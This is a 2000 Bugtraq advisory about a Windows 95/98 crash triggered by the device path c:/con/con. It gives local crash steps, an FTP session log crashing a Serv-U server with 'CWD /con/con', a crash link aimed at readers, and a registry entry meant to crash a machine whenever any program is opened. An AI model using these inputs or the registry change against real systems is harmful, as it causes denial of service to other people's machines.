[14189] in bugtraq
con\con is a old thing (anyway is cool)
daemon@ATHENA.MIT.EDU (Ussr Labs)
Tue Mar 7 08:58:41 2000
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Message-Id: <NCBBKFKDOLAGKIAPMILPCENECCAA.labs@ussrback.com>
Date: Mon, 6 Mar 2000 14:46:44 -0300
Reply-To: Ussr Labs <labs@USSRBACK.COM>
From: Ussr Labs <labs@USSRBACK.COM>
X-To: BUGTRAQ <bugtraq@securityfocus.com>
To: BUGTRAQ@SECURITYFOCUS.COM
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- ----------------------------------------------------------------------
- ----
New exploit found by the securax crew on 3/3/error
for: windoze 98 maybe 95 too...
not for NT4 or win2K
When we looked at the new exploit for ie that uses the image
c:/con/con
(http://www.zoomnet.net/~quick/error/crash.html)
we experimented a bit with that unexisting path.
We found that any program in windows 98 will crash if you try to open
that file.
eg: try Start --> run --> c:/con/con
or open in Word the non-existing document c:/con/con
both attempts will result in en Blues Screen of death and a lockup.
This can also be exploited to crash remote servers
Look what we tryed on this servU-FTP v 2.4a
(works on any windoze 98 FTP even with anonyous or guest account)
it looked something like this:
230 user logged in, proceed
SYST
215 UNIX TYPE:L8
connect ok!
PWD
257 "c:/home" is current directory.
haal directory op
TYPE A
200 Type set to A.
PORT xx.xx.xx.xx :-)
200 PORT Command succesful
LIST
150 Opening ASCII mode data connect
Download: 86 bytes
Wacht op de server
226 transfer complete
CDUP
250 directory changed to /c:/
PWD
250 "/c:/" is current directory
CWD /con/con --> this does the trick
...
no more response :-) server crashed.
This is probably just the beginning of a new series of exploits for
windoze.
this little flaw could easily be used in a macro virus. maybe even be
placed in the registry
HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\open
c:\con\con "%1" %*
Da G#Df@RTER & Pathos (securax)
www.securax.org
- ----------------------------------------------------------------------
- ----
this is a really old thing, (good but old), we found it, like 1 year
ago with the
nul/nul, (now are con/con) and we found others but all with the same
error overflow over Explorer.exe and VFat,
windows 95 and windows 98.
to anyone who want to crash the windows 9x click : here
>file://c:\nul\nul<
u n d e r g r o u n d s e c u r i t y s y s t e m s r e s e a r c
h
http://www.ussrback.com
-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.2 for non-commercial use <http://www.pgp.com>
iQA/AwUBOMPvBNybEYfHhkiVEQKedQCfYYyh2G1TOaE5HdtXo0eNc+/K2lgAoIkt
U+6L5I9uSGENV3KFuyKQ8xqu
=vwMM
-----END PGP SIGNATURE-----
